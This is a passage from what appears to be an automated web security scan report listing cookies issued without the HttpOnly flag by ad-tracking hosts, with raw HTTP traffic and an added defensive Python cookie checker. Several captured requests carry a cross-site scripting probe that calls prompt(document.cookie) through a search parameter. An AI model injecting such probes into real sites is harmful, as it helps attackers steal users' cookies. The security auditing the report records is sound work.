Set-Cookie: ses2=9844^26; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69240; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3142787.js^3^1315313158^1315313159&3142736.js^5^1315313158^1315313158&3147282.js^2^1315313158^1315313158&3218923.js^1^1315313158^1315313158&638178.js^5^1315313158^1315313157&3172565.js^2^1315313158^1315313158; expires=Tue, 13-Sep-2011 12:45:59 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1945

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3142787"
...[SNIP]...
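The findings in this section all report the same condition, so one checker serves them all. The script below is an added example, not part of the XSS.Cx report or of any scanner's code. It parses the Set-Cookie headers of a raw HTTP response and reproduces the per-cookie verdict the report gives in prose, adding two checks the report leaves to the reader: a cookie whose Expires is earlier than the response's own Date header (the fetchback cookies in 10.85, U_mtupes=deleted in 10.73, and the httponly MYFMP_ cookie in 10.72) is treated as a deletion rather than an issued cookie, and a value that embeds an RFC 1918 address is flagged, as the frontier.com ARPT cookie in 10.70 and 10.71 does (10.160.118.21 and 10.160.118.20). The session-name pattern is a heuristic chosen for this example; the sample responses are trimmed excerpts of findings 10.70, 10.72 and 10.85 above, and the SESSION sample is constructed.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import List, Optional, Tuple

# Heuristic (assumption): cookie names that usually carry a session or auth token.
SESSION_NAME_RE = re.compile(r"sess|^sid$|_sid$|token|auth|login", re.I)
# RFC 1918 ranges; a match inside a cookie value is an internal-address disclosure.
PRIVATE_IP_RE = re.compile(
    r"(?<!\d)(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}"
    r"|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}"
    r"|192\.168\.\d{1,3}\.\d{1,3})(?!\d)")

@dataclass
class CookieFinding:
    name: str
    httponly: bool
    secure: bool
    deletion: bool             # Expires in the past, Max-Age=0 or value "deleted": a clear, not an issue
    session_like: bool         # name matches SESSION_NAME_RE
    private_ip: Optional[str]  # RFC 1918 address embedded in the value, if any

def parse_http_date(text: str) -> Optional[datetime]:
    # Handles both 'Thu, 6-Sep-2012 12:03:48 GMT' and 'Wed, 07 Sep 2011 15:50:30 GMT', as seen above.
    body = text.split(",", 1)[1] if "," in text else text
    body = re.sub(r"\s*(GMT|UTC)\s*$", "", body.strip())
    for fmt in ("%d-%b-%Y %H:%M:%S", "%d %b %Y %H:%M:%S"):
        try:
            return datetime.strptime(body, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    return None

def split_headers(raw_response: str) -> List[Tuple[str, str]]:
    # (name, value) pairs from the header block; the status line and the body are skipped.
    head = raw_response.replace("\r", "").split("\n\n", 1)[0]
    pairs = []
    for line in head.split("\n")[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            pairs.append((k.strip(), v.strip()))
    return pairs

def audit_response(raw_response: str) -> List[CookieFinding]:
    headers = split_headers(raw_response)
    # The response's own Date header is "now", so expiry checks are reproducible offline.
    now = next((parse_http_date(v) for k, v in headers if k.lower() == "date"), None)
    findings = []
    for k, v in headers:
        if k.lower() != "set-cookie":
            continue
        parts = [p.strip() for p in v.split(";")]
        name, _, value = parts[0].partition("=")  # first '=' only: values like d=...&s=... survive
        attrs = {}
        for p in parts[1:]:
            if p:  # skip the empty piece a trailing ';' leaves behind
                ak, _, av = p.partition("=")
                attrs[ak.strip().lower()] = av.strip()
        expires = parse_http_date(attrs["expires"]) if "expires" in attrs else None
        deletion = (value == "deleted" or attrs.get("max-age") == "0"
                    or (expires is not None and now is not None and expires <= now))
        ip = PRIVATE_IP_RE.search(value)
        findings.append(CookieFinding(
            name=name.strip(), httponly="httponly" in attrs, secure="secure" in attrs,
            deletion=deletion, session_like=bool(SESSION_NAME_RE.search(name)),
            private_ip=ip.group(0) if ip else None))
    return findings

def verdict(f: CookieFinding) -> Tuple[str, str]:
    # (severity, note) for one cookie; deletions and HttpOnly cookies are not findings.
    if f.deletion:
        return "none", "expired or cleared cookie; flags are irrelevant"
    if f.httponly:
        return "none", "HttpOnly set"
    note = "session-like name without HttpOnly" if f.session_like else "no HttpOnly; review the cookie's purpose"
    if f.private_ip:
        note += "; value embeds private address " + f.private_ip
    return ("high" if f.session_like else "information"), note

# Samples excerpted from findings 10.70, 10.72 and 10.85 above (headers trimmed).
FRONTIER = """HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8827CMWWO; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Date: Tue, 06 Sep 2011 12:03:53 GMT
"""
YAHOO = """HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:47 GMT
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVpMDhxY2Q3NXZjNGQiO3M6MjoibXQiO2k6MTMxNTMxMjE4Nzt9; expires=Fri, 06-Sep-2013 12:29:47 GMT; path=/; domain=my.yahoo.com
Set-Cookie: MYFMP_Sacfea3=d=7142216504e66123b932767.54181906&s=6JRSdtjl3lb3w.8KyXWmOA--; expires=Mon, 05-Sep-2011 12:29:47 GMT; path=/; domain=frontier.my.yahoo.com; httponly
"""
FETCHBACK = """HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Set-Cookie: uid=1_1315309925_1315309925595:3279793012126635; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
"""
# Constructed sample (not from the report): a session cookie without flags beside a fully flagged one.
SESSION = """HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:00:00 GMT
Set-Cookie: ASP.NET_SessionId=abc123def456ghi789; path=/
Set-Cookie: PREF=lang=en; expires=Wed, 06 Sep 2012 12:00:00 GMT; path=/; Secure; HttpOnly
"""
```

Call audit_response() on any response captured by the proxy and verdict() on each result; a "high" row is the case the report's session-token sentence is warning about, and "none" rows (cleared cookies, HttpOnly cookies) are noise that can be dropped from a triage list. The ARPT row comes back as "information" with the embedded 10.160.118.21 address noted, which is the detail worth recording when following the report's advice to review the cookie's contents.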

10.85. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3018 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: act=1_1315103291; opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315309925_1315309925595:3279793012126635; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: apd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 11:52:05 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40

<!-- opt out exists or ip filtered -->

10.86. http://pixel.quantserve.com/api/segments.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/segments.json?a=p-7elq8ZYievA_s&callback=qc_results HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EF0BHwHRB4EACa0QvYgQDRyEAQA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EL0BGAHSB7vRG9iBDYTREA; expires=Mon, 05-Dec-2011 12:55:20 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
Cache-Control: private, no-transform, must-revalidate, max-age=600
Expires: Tue, 06 Sep 2011 13:05:20 GMT
Content-Length: 39
Date: Tue, 06 Sep 2011 12:55:20 GMT
Server: QS

qc_results({"segments":[{"id":"D"}]});

10.87. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=2025226563;fpan=1;fpa=P0-1156348243-1315331724508;ns=0;url=http%3A%2F%2Fwww.myfitv.com%2Fsearch%3Futf8%3D%25E2%259C%2593%26query%3Dxss%25003d6ce%2527%253prompt(document.cookie)%2F%2F9336b0fa1c5;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1315331724504;tzo=300;a=p-7elq8ZYievA_s;labels=myfitv HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?utf8=%E2%9C%93&query=xss%003d6ce%27%3prompt(document.cookie)//9336b0fa1c5
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EE4BHwHSB4EQCa0QvYgQDRyEAQA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EL0BGAHSB7vRG9iBDYTREA; expires=Mon, 05-Dec-2011 12:55:24 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Tue, 06 Sep 2011 12:55:24 GMT
Server: QS


10.88. http://r1-ads.ace.advertising.com/site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.957105.766755.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 12:44:52 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 662
Date: Tue, 06 Sep 2011 12:44:52 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 12:44:52 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

10.89. http://r1-ads.ace.advertising.com/site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.957105.790042.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 12:44:52 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 662
Date: Tue, 06 Sep 2011 12:44:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 12:44:52 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

10.90. http://redirect.rtrk.com/redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 587
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:56 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?scid=2323693
...[SNIP]...

10.91. http://sales.liveperson.net/hc/21807557/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/21807557/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/21807557/?&site=21807557&cmd=mTagUrl&lpCallId=407482566544-792098556877&protV=20&lpjson=1&SV%21impression-query-name=chat-scottrade-english-header&SV%21impression-query-room=chat-scottrade-english-header&id=8862763361&info=button-impression%3Achat-scottrade-english-header%28Online%20Trading%20%26%20Investing%20%u2013%20Stock%20Trading%20Tools%2C%20Platforms%20%26%20More%20%7C%20Scottrade%29&waitForVisitor=true&d=1315331337781&page=http%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8088123106932915638; HumanClickSiteContainerID_21807557=STANDALONE; LivePersonID=-5110247826455-1315313336:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQCCCSCCQ=AJBDBJDAOIIOIDAHABHJGONH; HumanClickACTIVE=1315313334861

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 06 Sep 2011 12:48:59 GMT
Set-Cookie: HumanClickSiteContainerID_21807557=STANDALONE; path=/hc/21807557
Set-Cookie: LivePersonID=-5110247826455-1315313336:-1:-1:-1:-1; expires=Wed, 05-Sep-2012 12:48:59 GMT; path=/hc/21807557; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"407482566544-792098556877","lpCallConfirm":"","lpData":[{"result":40}]}});

10.92. http://sales.liveperson.net/hc/21807557/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/21807557/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/21807557/?&site=21807557&cmd=mTagKnockPage&lpCallId=899421501671-998744760406&protV=20&lpjson=1&id=9931965344&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-scottrade-english-header%7ClpMTagConfig.db1%7ClpButton-header%7C%23chat-scottrade-english-footer%7ClpMTagConfig.db1%7ClpButton-footer%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading/fund-your-account.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8088123106932915638; LivePersonID=-5110247826455-1315313336:-1:-1:-1:-1; HumanClickSiteContainerID_21807557=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQCCCSCCQ=AJBDBJDAOIIOIDAHABHJGONH; HumanClickACTIVE=1315313334861; ASPSESSIONIDQATBDRTA=MLFCOIPBEDHBOHEOHFPGIFDG

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315313361328; expires=Wed, 07-Sep-2011 12:49:21 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 06 Sep 2011 12:49:21 GMT
Set-Cookie: HumanClickSiteContainerID_21807557=STANDALONE; path=/hc/21807557
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29844

lpConnLib.Process({"ResultSet": {"lpCallId":"899421501671-998744760406","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.93. http://sales.liveperson.net/hc/21807557/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/21807557/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/21807557/?&site=21807557&cmd=mTagKnockPage&lpCallId=137591478182-9251743555&protV=20&lpjson=1&id=8862763361&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-scottrade-english-header%7ClpMTagConfig.db1%7ClpButton-header%7C%23chat-scottrade-english-footer%7ClpMTagConfig.db1%7ClpButton-footer%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315262431881; ASPSESSIONIDQCCCSCCQ=AJBDBJDAOIIOIDAHABHJGONH

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=4698670149782373135; path=/hc/21807557
Set-Cookie: HumanClickACTIVE=1315313336397; expires=Wed, 07-Sep-2011 12:48:56 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 06 Sep 2011 12:48:56 GMT
Cache-Control: no-store
